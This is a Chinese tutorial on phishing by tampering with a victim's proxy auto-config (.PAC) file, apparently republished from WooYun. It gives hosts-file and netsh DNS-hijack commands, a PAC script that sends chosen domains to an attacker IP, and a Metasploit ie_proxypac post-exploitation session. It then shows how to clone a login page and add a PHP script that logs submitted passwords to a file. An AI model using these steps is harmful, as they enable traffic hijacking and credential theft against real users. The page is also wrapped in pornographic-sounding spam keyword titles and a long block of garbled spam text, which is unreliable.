精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

通過.PAC(自動配置代理)文件進行網絡釣魚

安全 黑客攻防
本文主要介紹的是Metasploit中的一個模塊ie_proxypac。通過.PAC(自動配置代理)文件來完全控制IE的用戶流量。只需要修改PAC文件,攻擊者就能使受害者訪問的某個域名指向攻擊者的IP。雖然沒有修改DNS但是可以達到同樣的效果,且這種方式較為隱蔽。已經有很多人使用這種方式進行網絡釣魚。

0x00 常見網絡釣魚方式

攻擊者進行網絡釣魚的方式常有以下幾種:

1. 通過修改受害者hosts文件(C:\WINDOWS\system32\drivers\etc\hosts)來實現;

2. 通過修改受害者dns來實現;

3. 已經進入路由器,直接修改路由器的DNS。

羅列的并不全,之后遇到的話再補充,上述三種方式很常見。

修改HOSTS文件,即攻擊者修改受害者HOSTS文件為如下形式:

127.0.0.1 localhost x.x.x.x www.wooyun.com

這樣就受害者訪問www.wooyun.com會直接訪問到x.x.x.x。在msf中可以使用inject_host腳本來實現。

修改dns進行攻擊:

攻擊者可是使用如下命令修改受害者的dns地址(管理員身份執行):

C:\Windows\system32>netsh interface ip show interfaces       

Idx  Met   MTU   狀態          名稱
---  ---  -----  -----------  -------------------
  1   50 4294967295  connected    Loopback Pseudo-Interface 1
 10   10   1500  connected    本地連接       

C:\Windows\system32>netsh interface ip set dns "本地連接" static 192.168.1.100
C:\Windows\system32>ipconfig /all | findstr 192.168.1.100
   DNS 服務器  . . . . . . . . . . . : 192.168.1.100

這樣就修改了受害者的DNS地址,之后可以使用msf的 fakedns來架設dns服務器來修改域名的解析地址。

除了直接修改路由器的DNS地址的以上兩種方式在某些環境下還是有一些缺點的,例如,一些牛逼的AV會檢測到文件的修改而發出報警,除此之外,如果受害者所處內網環境中的防火墻或路由器攔截對外部的DNS請求,修改受害者DNS的攻擊方式并不能生效(因為攻擊者架設的DNS在外網環境下)。

0x01 通過PAC代理

本文主要介紹的是Metasploit中的一個模塊ie_proxypac。通過.PAC(自動配置代理)文件來完全控制IE的用戶流量。只需要修改PAC文件,攻擊者就能使受害者訪問的某個域名指向攻擊者的IP。雖然沒有修改DNS但是可以達到同樣的效果,且這種方式較為隱蔽。已經有很多人使用這種方式進行網絡釣魚。

下面是一個PAC文件示例:

function FindProxyForURL(url, host)
{
if (shExpMatch(host, "www.wooyun.org")) {
 return "PROXY 192.168.52.129:80; DIRECT";
}
if (shExpMatch(host, "www.baidu.com")) {
 return "PROXY 192.168.52.129:80; DIRECT";
}
}

這個文件的配置是當受害者訪問www.wooyun.com以及www.baidu.com時,他會直接請求到攻擊者ip( 192.168.52.129)。

詳細的PAC編寫請查看http://findproxyforurl.com/pac-functions/。

將以上腳本保存為test.pac,在獲取meterpreter會話的基礎上使用ie_proxypac腳本:

  1. meterpreter > background   
  2. [*] Backgrounding session 1...  
  3. msf > use post/windows/manage/ie_proxypac  
  4. msf post(ie_proxypac) > set session 1  
  5. session => 1  
  6. msf post(ie_proxypac) > set REMOTE_PAC http://192.168.52.129/test.pac  
  7. REMOTE_PAC => http://192.168.52.129/test.pac  
  8. msf post(ie_proxypac) > show options       
  9.    
  10. Module options (post/windows/manage/ie_proxypac):      
  11.    
  12.    Name           Current Setting         Required  Description  
  13.    ----           ---------------         --------  -----------  
  14.    AUTO_DETECT    false                           yes       Automatically detect settings.  
  15.    DISABLE_PROXY  false                           yes       Disable the proxy server.  
  16.    LOCAL_PAC                                      no        Local PAC file.  
  17.    REMOTE_PAC     http://192.168.52.129/test.pac  no        Remote PAC file. (Ex: http://192.168.1.20/proxy.pac)  
  18.    SESSION        1                               yes       The session to run this module on.  
  19. msf post(ie_proxypac) > exploit       
  20.    
  21. [*] Setting automatic configuration script from local PAC file ...  
  22. [+] Automatic configuration script configured...  
  23. [*] Post module execution completed     

之后打開ie,internet選項->連接->局域網設置:

 

Alt text

 

可以看到pac已經使用pac文件進行了代理。

代理盡量使用遠程代理,因為IE11默認禁止本地代理,如果使用本地代理,代理是無效的。詳情測試發現,如果連接了vpn,pac代理是失效的。

現在再訪問www.baidu.com,www.wooyun.org,會看到已經轉移到了我們制定的ip:

 

Alt text

 

0x02 能做什么

這里我們修改pac文件如下:

function FindProxyForURL(url, host)
{
if (shExpMatch(host, "www.wooyun.org")) {
 return "PROXY 192.168.52.129:80; DIRECT";
}
}

這里ip要改成自己的web的ip,如果受害者請求的網站host為 www.wooyun.org 時,滿足規則,然后跳轉到我們指定的ip地址,這里我們可以來構造釣魚。

打開wooyun,右鍵查看源代碼,將所有源代碼保存為index.html,放在網站根目錄下,因為當受害者請求 http://wooyun.org,其host為 wooyun.org 不滿足代理條件,就會直接請求,所以我們把源代碼中的www.wooyun.org,改為wooyun.org:

 

Alt text

 

然后找到url,src,href標簽,修改為http://wooyun.org/xxxx 的形式,比如

  1. <link href="/css/style.css?v=201501291909" rel="stylesheet" type="text/css"/> 

修改為

  1. <link href="http://wooyun.org/css/style.css?v=201501291909" rel="stylesheet" type="text/css"/> 

改完以后,基本上就算克隆成功了:

 

Alt text

 

下來要把登陸頁面的的源碼復制過來,打開http://www.wooyun.org/user.php?action=login,右鍵復制源碼,保存為user.php,放在網站根目錄下,修改源碼中的url,src,href。修改完之后,打開index.html文件,定位登錄,修改href為 user.php?action=login,修改以后此標簽為:

  1. <a href="user.php?action=login">登錄</a> | <a href="http://wooyun.org/user.php?action=register" class="reg">注冊</a> 

打開user.php,定位用戶登錄表單,修改表單action為post.php:

  1. <a href="#">用戶登錄</a></div>  
  2.         </div>  
  3. <form action="post.php" method="POST">    
  4. ..... 

在網站根目錄新建post.php,添加如下代碼:

  1. <?php $file = 'data.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=http://wooyun.org/user.php?action=login" /> 

這樣釣魚站就搭建好了。

當用戶登錄時:

 

Alt text

 

點擊登陸以后會跳轉到http://wooyun.org/user.php?action=login

 

Alt text

 

查看data.txt:

 

Alt text

 

只是簡單地一個示例,具體可以通過修改pac文件來實現控制瀏覽器是否進行代理。

0x03 小結

此種方式進行網絡釣魚,做的細致的話,很難被發現,而且隱蔽性好,缺點就是連接vpn以后代理將會失效。以上是個人的測試結果,請各位大牛指正。

責任編輯:藍雨淚 來源: 烏云知識庫
相關推薦

2024-05-24 14:39:33

2017-12-07 09:49:25

2023-12-14 15:34:19

2021-03-10 10:05:59

網絡釣魚攻擊黑客

2010-09-03 13:55:25

2017-09-14 15:55:20

2020-08-06 08:23:24

Nginx反向代理Web安全

2017-12-07 22:58:14

2021-08-29 21:58:58

釣魚攻擊微軟SharePoint

2017-02-17 07:12:24

2023-08-07 15:43:55

2023-08-02 19:51:33

2011-04-14 18:13:37

Imperva文件保護

2013-03-20 10:19:35

2010-09-02 13:37:13

2017-09-14 15:16:56

2023-03-27 21:20:33

2012-05-10 10:23:57

蘋果OS X 10.7正式發布

2025-02-21 15:39:26

2022-02-16 07:37:36

惡意文檔網絡釣魚攻擊
點贊
收藏

51CTO技術棧公眾號

日韩在线小视频| 午夜日韩在线电影| 国产精品久久久久久久久久久新郎| 亚洲少妇18p| 色戒汤唯在线| 久久午夜电影网| 国产精品9999| 免费成人深夜夜行网站| 精品视频在线观看免费观看 | 黄色片网站免费在线观看| 黄色欧美日韩| 亚洲欧美日韩区| 欧美精品无码一区二区三区| 在线国产91| 国产成人精品aa毛片| 久久久久久久影院| 国产jjizz一区二区三区视频| 欧洲成人一区| 一区二区高清视频在线观看| 国产综合第一页| 欧美日韩 一区二区三区| 婷婷色综合网| 亚洲精品久久久久久久久久久久久| 欧美视频在线观看网站| 98在线视频| 成人精品gif动图一区| 日产日韩在线亚洲欧美| 精品国产视频一区二区三区| 亚洲精品18| 色综合色狠狠综合色| 欧美最大成人综合网| 国产精品久久777777换脸| 国产在线不卡| 中文字幕亚洲精品| 欧美丰满熟妇bbb久久久| 国产成人精品一区二三区在线观看 | 天堂а在线中文在线无限看推荐| 日本不卡一区二区三区| 少妇高潮 亚洲精品| 人体私拍套图hdxxxx| 亚洲精品三区| 色欧美乱欧美15图片| 91视频成人免费| 国产在线一二三| 豆国产96在线|亚洲| 国产精品网址在线| 成人精品免费在线观看| 91高清一区| 一夜七次郎国产精品亚洲| 少妇献身老头系列| 色999久久久精品人人澡69| 亚洲18女电影在线观看| 中文字幕欧美日韩一区二区| 狠狠v欧美ⅴ日韩v亚洲v大胸| 国产福利91精品| 国产精品美女久久久久av超清| 影音先锋亚洲天堂| 欧美人成在线| 九九热精品视频| 精品手机在线视频| 黑丝美女一区二区| 日韩www在线| 日本人添下边视频免费| 免费一级欧美在线大片| 欧美片在线播放| 中文字幕国产传媒| 欧美123区| 色综合天天综合色综合av | 亚洲国产综合色| 美女黄色片网站| 免费在线毛片网站| 在线精品日韩| 劲爆欧美第一页| 99国产精品免费视频观看| 国产香蕉一区二区三区在线视频| 久草免费资源站| 激情不卡一区二区三区视频在线| 欧美日韩国产综合视频在线观看| caoporn超碰97| 日韩成人动漫| 欧美在线免费视屏| 波多野结衣天堂| 成人涩涩视频| 欧美精品亚洲一区二区在线播放| 亚洲va在线va天堂va偷拍| 亚洲电影二区| 日韩欧美一区在线观看| 佐佐木明希电影| 136国产福利精品导航网址应用| 日韩欧美一二区| 香蕉视频污视频| 欧美日韩破处| 亚洲午夜未满十八勿入免费观看全集| 影音先锋男人在线| 国产精品99久久久久久动医院| xxxxxxxxx欧美| a级黄色片免费看| 99热免费精品在线观看| 欧美做受高潮电影o| 色老头在线视频| 免费成人av资源网| 91免费国产网站| 人妻一区二区三区| 久久久激情视频| 在线看视频不卡| 女人天堂av在线播放| 亚洲一二三专区| 成年人视频网站免费观看| 精品欧美日韩精品| 91精品国产欧美一区二区18| 欧美极品jizzhd欧美仙踪林| 免费成人av| 日韩中文字幕在线免费观看| 久久网中文字幕| 久久久综合网| 亚洲va久久久噜噜噜久久天堂| 日韩一区二区三区不卡| 国产精品每日更新在线播放网址| 欧美极品少妇无套实战| 原纱央莉成人av片| 91精品国产综合久久久蜜臀图片 | 2014亚洲天堂| 国产综合婷婷| 国产精品老女人精品视频| www.99视频| 久久免费视频一区| 亚洲精品天堂成人片av在线播放| 亚洲私拍视频| 日韩亚洲欧美一区二区三区| 人妻少妇无码精品视频区| 欧美理论在线| 国产精品网红福利| 日本大臀精品| 国产精品―色哟哟| www.日本三级| 成人免费网站www网站高清| 日韩精品在线一区二区| 亚洲黄色小说视频| 欧美激情1区2区3区| 欧日韩不卡在线视频| 亚洲av无码专区在线| 国产精品久久久久久福利一牛影视 | 亚洲综合20p| 精品成人影院| 57pao国产精品一区| www.久久久久久久久久| 中文字幕一区二区三区av| 日韩精品无码一区二区三区免费 | 99精品国产在热久久| 亚洲精品欧美日韩专区| 91青青在线视频| 色综合天天天天做夜夜夜夜做| 亚洲精品激情视频| 亚洲影视一区| 国产欧美一区二区三区视频| 国外av在线| 精品福利在线看| 最新国产精品自拍| 91影院成人| 青草热久免费精品视频| 色综合久久网女同蕾丝边| 香蕉成人啪国产精品视频综合网| 国产伦理在线观看| 羞羞色午夜精品一区二区三区| 国产脚交av在线一区二区| 青青草手机在线| 欧美日韩国产综合新一区 | av大全在线免费看| 日本韩国一区二区| mm131丰满少妇人体欣赏图| 韩国av一区| 5g影院天天爽成人免费下载| 国产在线更新| 欧美日韩久久久一区| 免费观看特级毛片| 精品亚洲国内自在自线福利| 在线一区高清| 国产成人免费av一区二区午夜| 久久人人爽亚洲精品天堂| 国产精品久久影视| 亚洲精品伦理在线| 国产成人精品一区二区三区在线观看| 国产真实久久| 精品国产乱码久久久久久丨区2区| 国产高清在线a视频大全| 欧美va日韩va| www.日本精品| 国产日产欧美一区二区视频| 天天干天天草天天| 亚洲乱码免费伦视频| 成人av资源网| 玖玖在线播放| 亚洲亚裔videos黑人hd| 一卡二卡三卡在线| 一区二区三区美女| 无码人妻少妇色欲av一区二区| 欧美视频在线观看| 国产精品一码二码三码在线| 自拍网站在线观看| 色悠悠久久久久| www.四虎在线观看| 欧美日韩在线影院| 婷婷丁香综合网| 国产91丝袜在线观看| www黄色av| 国产精品成人av| 国产精品手机视频| 成人性生活av| 久久亚洲春色中文字幕| 无码精品视频一区二区三区| 欧美在线影院一区二区| 国产一级中文字幕| 国产欧美一区二区三区在线老狼 | 色www亚洲国产阿娇yao| 国产精品一级在线| 蜜臀久久99精品久久久酒店新书 | 久久久成人精品一区二区三区| 精品视频在线你懂得| 国产精品入口免费视| 女同视频在线观看| 最近2019中文字幕mv免费看| 秋霞欧美在线观看| 欧美人xxxx| 久久亚洲天堂网| 亚洲欧美色图小说| av网站免费在线看| 成人高清视频在线观看| 99热这里只有精品在线播放| 亚洲网址在线| 日韩欧美亚洲v片| youjizz欧美| 国产99久久精品一区二区永久免费| 蜜桃视频在线观看www社区| 日韩黄色av网站| 国产男男gay体育生网站| 日本韩国精品在线| 日韩免费av片| 亚洲另类色综合网站| 国产黄色录像视频| 久久综合九色综合久久久精品综合| 日本人dh亚洲人ⅹxx| 久久99精品国产.久久久久久| 日韩精品―中文字幕| 国内久久精品| 韩国黄色一级大片| 99re6这里只有精品| 日本午夜精品一区二区| 麻豆一区二区麻豆免费观看| 亚洲在线观看视频| 日本精品另类| 国产成人精品最新| 亚洲一区站长工具| 91chinesevideo永久地址| 青草av在线| 欧美大片在线影院| av网站免费在线观看| 久久精品国产v日韩v亚洲| 国产剧情在线观看| 国产视频精品xxxx| 天堂av中文在线资源库| 亚洲国产成人91精品| 蜜臀av免费在线观看| 精品国一区二区三区| 亚洲精品一区二区三区四区| 欧美一区二区三区四区久久 | 无遮挡动作视频在线观看免费入口| 国产婷婷色综合av蜜臀av| 婷婷综合激情网| 欧美一区二区三区电影| 国产乱淫av片免费| 日韩一区国产二区欧美三区| 国产后入清纯学生妹| 日韩欧美自拍偷拍| 丁香六月色婷婷| 精品成a人在线观看| 午夜福利理论片在线观看| 亚洲精品mp4| 青青青草网站免费视频在线观看| 亚洲免费av片| 成人激情电影在线看| 在线视频亚洲欧美| 麻豆国产在线播放| 国产一区二区日韩精品欧美精品| 毛片在线播放网址| 中文精品99久久国产香蕉| av播放在线观看| 美女av一区二区三区 | 国产午夜大地久久| 免费看亚洲片| www.99在线| 国产一区二区不卡在线| 国产精品亚洲一区二区无码| 91老师国产黑色丝袜在线| 精品一区二区三区蜜桃在线| 中文字幕制服丝袜成人av| 欧美极品视频在线观看| 夜夜亚洲天天久久| 日本少妇bbwbbw精品| 色婷婷一区二区| 91亚洲国产成人久久精品麻豆| 日韩视频免费观看高清完整版| 高清国产mv在线观看| 亚洲欧美日韩区| 伊人在我在线看导航| 欧美一级免费视频| 日韩综合久久| 久久精品久久精品国产大片| 久久激情电影| 日韩欧美不卡在线| 麻豆成人免费电影| 日韩少妇一区二区| 国产精品日日摸夜夜摸av| 成人免费毛片东京热| 色综合天天综合网天天狠天天| 99精品久久久久久中文字幕| 亚洲美女精品成人在线视频| 巨大荫蒂视频欧美另类大| 97超碰国产精品女人人人爽| 91精品麻豆| 久久综合中文色婷婷| 中文字幕av亚洲精品一部二部| 99精品视频在线看| 国产成人精品免费看| 国产精品1区2区3区4区| 亚洲激情六月丁香| 男人天堂视频网| 日韩欧美一区二区免费| 国产精品影院在线| 奇米成人av国产一区二区三区| 日韩免费精品| 亚洲精品中字| 久久五月激情| 99re这里只有| 伊人性伊人情综合网| 亚洲精品一区二区二区| 亚洲精品98久久久久久中文字幕| www免费视频观看在线| 国产精品免费视频久久久| 日韩亚洲精品在线观看| 日韩资源av在线| 999在线观看精品免费不卡网站| 中文字幕一区二区三区四| 国产欧美1区2区3区| 特级毛片www| 亚洲第一视频在线观看| 性欧美video高清bbw| 国产中文字幕亚洲| 清纯唯美综合亚洲| 人人爽人人av| 不卡av电影在线播放| 成人免费毛片东京热| 欧美亚洲国产一区二区三区va| 四虎影视精品成人| 97国产真实伦对白精彩视频8| 久久69av| 青草全福视在线| 久久91精品国产91久久小草| 国产黄色大片免费看| 在线观看日韩一区| 国产一二三在线观看| 日韩av黄色在线观看| 国产精品羞羞答答在线观看| 中文字幕日本最新乱码视频| 97久久精品人人做人人爽| 欧美日韩午夜视频| 欧美一区二区久久久| 日本三级在线播放完整版| 国产精自产拍久久久久久蜜| 欧美视频免费| 在线能看的av网站| 国产精品对白交换视频| 91亚洲精品国偷拍自产在线观看 | 99精品美女| 免费看的av网站| 欧美日韩免费看| av网站大全在线观看| 亚洲自拍偷拍第一页| 一本久道久久综合婷婷鲸鱼| 国产精品815.cc红桃| 在线不卡欧美精品一区二区三区| 色a资源在线| 欧美另类一区| 国产麻豆一精品一av一免费| 朝桐光av在线| 日韩成人在线视频| 六九午夜精品视频| 日韩精品一区二区免费| 久久综合色天天久久综合图片| 伊人网综合在线| 久久免费视频网| re久久精品视频| 日本成人在线免费| 在线一区二区三区四区| 污视频网站在线免费| 欧美污视频久久久| 国产精品一品二品| 中文永久免费观看| 97精品国产91久久久久久| 亚洲精品二区三区| 欧美色图亚洲激情|